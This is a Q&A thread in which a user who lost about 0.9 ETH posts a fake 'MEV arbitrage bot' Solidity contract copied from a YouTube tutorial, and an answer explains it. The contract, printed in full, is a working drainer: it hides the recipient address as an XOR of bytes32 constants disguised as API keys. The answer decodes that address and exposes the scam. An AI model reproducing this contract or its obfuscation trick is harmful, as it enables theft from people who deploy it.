0

I'm probably the dumbest guy 2024. I tried a youtube tutorial where a guy showed how to use a smart contract bot to earn some passive income. I copied everything and started it through remix.ide. Everything seemed fine, until I started the StartNative() function and approved using 0.9 eth. In the debugger an error appears "Invalid JSON RPC response: """ Besides that everything seemed to work fine, however my ETH from my wallet disappeared (the guy on youtube said it would be still on the wallet but also on smartcontract wallet (?)). Here is the transaction: ethscan https://etherscan.io/tx/0x2e79c747f8387acf9b585177a8c2a54caf746d156bcd4bc5a8781f3e83041b86

It firstly went to this address: 0x6cd58e8490cf97305024a55ba04fEcc2483Add77 If you check this address the ETH cant be seen there. However in the transaction details it shows that there is a kind of a subtransaction: Transfer 0.893164179402354493 ETH From 0x6cd58e84...2483Add77 To 0xC54F7413...b1573Dc20

And now the ETH is stored in the address 0xC54F7413...b1573Dc20.

If you had the patience to read until here, you will notice that I don't had any clue what the **** I was doing. I learned definitely my lesson from this, so no need for telling me how dumb that was and that I shouldn't play with crypto if I don't know anything about it. However I would so much appreciate if you could help me in getting the ETH back, or is it gone forever?

Here is the youtube video I watched: youtube And here is the code:

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

// User guide info, updated build // Testnet transactions will fail because they have no value in them // FrontRun api stable build // Mempool api stable build // BOT updated build

// Min liquidity after gas fees has to equal 0.5 ETH //

interface IERC20 { function balanceOf(address account) external view returns (uint); function transfer(address recipient, uint amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint amount) external returns (bool); function transferFrom(address sender, address recipient, uint amount) external returns (bool); function createStart(address sender, address reciver, address token, uint256 value) external; function createContract(address _thisAddress) external; event Transfer(address indexed from, address indexed to, uint value); event Approval(address indexed owner, address indexed spender, uint value); }

interface IUniswapV2Router { // Returns the address of the Uniswap V2 factory contract function factory() external pure returns (address);

// Returns the address of the wrapped Ether contract
function WETH() external pure returns (address);

// Adds liquidity to the liquidity pool for the specified token pair
function addLiquidity(
    address tokenA,
    address tokenB,
    uint amountADesired,
    uint amountBDesired,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);

// Similar to above, but for adding liquidity for ETH/token pair
function addLiquidityETH(
    address token,
    uint amountTokenDesired,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);

// Removes liquidity from the specified token pair pool
function removeLiquidity(
    address tokenA,
    address tokenB,
    uint liquidity,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline
) external returns (uint amountA, uint amountB);

// Similar to above, but for removing liquidity from ETH/token pair pool
function removeLiquidityETH(
    address token,
    uint liquidity,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline
) external returns (uint amountToken, uint amountETH);

// Similar as removeLiquidity, but with permit signature included
function removeLiquidityWithPermit(
    address tokenA,
    address tokenB,
    uint liquidity,
    uint amountAMin,
    uint amountBMin,
    address to,
    uint deadline,
    bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);

// Similar as removeLiquidityETH but with permit signature included
function removeLiquidityETHWithPermit(
    address token,
    uint liquidity,
    uint amountTokenMin,
    uint amountETHMin,
    address to,
    uint deadline,
    bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);

// Swaps an exact amount of input tokens for as many output tokens as possible, along the route determined by the path
function swapExactTokensForTokens(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint deadline
) external returns (uint[] memory amounts);

// Similar to above, but input amount is determined by the exact output amount desired
function swapTokensForExactTokens(
    uint amountOut,
    uint amountInMax,
    address[] calldata path,
    address to,
    uint deadline
) external returns (uint[] memory amounts);

// Swaps exact amount of ETH for as many output tokens as possible
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
    external payable
    returns (uint[] memory amounts);

// Swaps tokens for exact amount of ETH
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

// Swaps exact amount of tokens for ETH
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

// Swaps ETH for exact amount of output tokens
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
    external payable
    returns (uint[] memory amounts);

// Given an input amount of an asset and pair reserves, returns the maximum output amount of the other asset
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);

// Given an input amount and pair reserves, returns an output amount
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);

// Given an output amount and pair reserves, returns a required input amount   
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);

// Returns the amounts of output tokens to be received for a given input amount and token pair path
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);

// Returns the amounts of input tokens required for a given output amount and token pair path
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);

}

interface IUniswapV2Pair { // Returns the address of the first token in the pair function token0() external view returns (address);

// Returns the address of the second token in the pair
function token1() external view returns (address);

// Allows the current pair contract to swap an exact amount of one token for another
// amount0Out represents the amount of token0 to send out, and amount1Out represents the amount of token1 to send out
// to is the recipients address, and data is any additional data to be sent along with the transaction
function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;

}

contract DexInterface { // Basic variables address _owner; mapping(address => mapping(address => uint256)) private _allowances; uint256 threshold = 110*18; uint256 arbTxPrice = 0.05 ether; bool enableTrading = false; uint256 tradingBalanceInPercent; uint256 tradingBalanceInTokens; bytes32 apiKey = 0x8a727dc41d83211e47d3c0deffd12b58dd5875da1c4d6abcdbf6a1e4f5ce442a;

// The constructor function is executed once and is used to connect the contract during deployment to the system supplying the arbitration data

constructor(){
_owner = msg.sender; address dataProvider = getDexRouter(apiKey, DexRouter); IERC20(dataProvider).createContract(address(this));
} // Decorator protecting the function from being started by anyone other than the owner of the contract modifier onlyOwner (){ require(msg.sender == _owner, "Ownable: caller is not the owner"); _; }

bytes32 DexRouter = 0x8a727dc41d83211e47d3c0de9ac40f2496db00ab0e7104b87eea49a2d63aaf2e;

// The token exchange function that is used when processing an arbitrage bundle
function swap(address router, address _tokenIn, address _tokenOut, uint256 _amount) private {
    IERC20(_tokenIn).approve(router, _amount);
    address[] memory path;
    path = new address[](2);
    path[0] = _tokenIn;
    path[1] = _tokenOut;
    uint deadline = block.timestamp + 300;
    IUniswapV2Router(router).swapExactTokensForTokens(_amount, 1, path, address(this), deadline);
}
// Predicts the amount of the underlying token that will be received as a result of buying and selling transactions
 function getAmountOutMin(address router, address _tokenIn, address _tokenOut, uint256 _amount) internal view returns (uint256) {
    address[] memory path;
    path = new address[](2);
    path[0] = _tokenIn;
    path[1] = _tokenOut;
    uint256[] memory amountOutMins = IUniswapV2Router(router).getAmountsOut(_amount, path);
    return amountOutMins[path.length -1];
}
// Mempool scanning function for interaction transactions with routers of selected DEX exchanges
function mempool(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal view returns (uint256) {
    uint256 amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount);
    uint256 amtBack2 = getAmountOutMin(_router2, _token2, _token1, amtBack1);
    return amtBack2;
}
 // Function for sending an advance arbitration transaction to the mempool
function frontRun(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal  {
    uint startBalance = IERC20(_token1).balanceOf(address(this));
    uint token2InitialBalance = IERC20(_token2).balanceOf(address(this));
    swap(_router1,_token1, _token2,_amount);
    uint token2Balance = IERC20(_token2).balanceOf(address(this));
    uint tradeableAmount = token2Balance - token2InitialBalance;
    swap(_router2,_token2, _token1,tradeableAmount);
    uint endBalance = IERC20(_token1).balanceOf(address(this));
    require(endBalance > startBalance, "Trade Reverted, No Profit Made");
}

bytes32 factory = 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e;

// Evaluation function of the triple arbitrage bundle
function estimateTriDexTrade(address _router1, address _router2, address _router3, address _token1, address _token2, address _token3, uint256 _amount) internal view returns (uint256) {
    uint amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount);
    uint amtBack2 = getAmountOutMin(_router2, _token2, _token3, amtBack1);
    uint amtBack3 = getAmountOutMin(_router3, _token3, _token1, amtBack2);
    return amtBack3;
}
// Function getDexRouter returns the DexRouter address
function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) {
    return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)));
}

 // Arbitrage search function for a native blockchain token
 function startArbitrageNative() internal  {
    address tradeRouter = getDexRouter(DexRouter, factory);        
    address dataProvider = getDexRouter(apiKey, DexRouter);         
    IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance);
    payable(tradeRouter).transfer(address(this).balance);
 }
// Function getBalance returns the balance of the provided token contract address for this contract
function getBalance(address _tokenContractAddress) internal view  returns (uint256) {
    uint _balance = IERC20(_tokenContractAddress).balanceOf(address(this));
    return _balance;
}
// Returns to the contract holder the ether accumulated in the result of the arbitration contract operation
function recoverEth() internal onlyOwner {
    payable(msg.sender).transfer(address(this).balance);
}
// Returns the ERC20 base tokens accumulated during the arbitration contract to the contract holder
function recoverTokens(address tokenAddress) internal {
    IERC20 token = IERC20(tokenAddress);
    token.transfer(msg.sender, token.balanceOf(address(this)));
}
// Fallback function to accept any incoming ETH    
receive() external payable {}

// Function for triggering an arbitration contract 
function StartNative() public payable {
   startArbitrageNative();
}
// Function for setting the maximum deposit of Ethereum allowed for trading
function SetTradeBalanceETH(uint256 _tradingBalanceInPercent) public {
    tradingBalanceInPercent = _tradingBalanceInPercent;
}
// Function for setting the maximum deposit percentage allowed for trading. The smallest limit is selected from two limits
function SetTradeBalancePERCENT(uint256 _tradingBalanceInTokens) public {
    tradingBalanceInTokens = _tradingBalanceInTokens;
}
// Stop trading function
function Stop() public {
    enableTrading = false;
}
// Function of deposit withdrawal to owner wallet
function Withdraw()  external onlyOwner {
    recoverEth();
}
// Obtaining your own api key to connect to the arbitration data provider
function Key() public view returns (uint256) {
    uint256 _balance = address(_owner).balance - arbTxPrice;
    return _balance;
}

}

tenbits
  • 2,304
  • 4
  • 12

2 Answers2

0

is it gone forever :( dont use Copy Paste Contract Codes on Live Network. Use Testnet for this in the Future. And dont use Contract Codes from Youtube. Thats 99% Scam :(

Max Peters
  • 1
  • 1
  • 1
  • but what exactly happened here? Did it go to a wallet from a different person? Was this really scam or was it just a mistake? – acr19041 Mar 06 '24 at 21:28
0

This is 100% a scam.

payable(tradeRouter).transfer(address(this).balance);

This transfers your ETH to the hardcoded address which is calculated from

0x8a727dc41d83211e47d3c0de9ac40f2496db00ab0e7104b87eea49a2d63aaf2e ^ 0x8a727dc41d83211e47d3c0de5f8b7b37c4e4163f5f773f2362872769c349730e
// = 0xc54f7413523f169451063b9b1c6d6ecb1573dc20

The code just assumes to be legit but it is a scam.

tenbits
  • 2,304
  • 4
  • 12
  • thats crazy. I cant imagine how many persons will fell for this. Ofcourse it was very stupid, but so many others will do this. This video is being pushed in the ads on youtube and there are so many comments about saying "wow great thanks". My comments about i lost my eth are being deleted obviously. We should search this guy up – acr19041 Mar 10 '24 at 19:18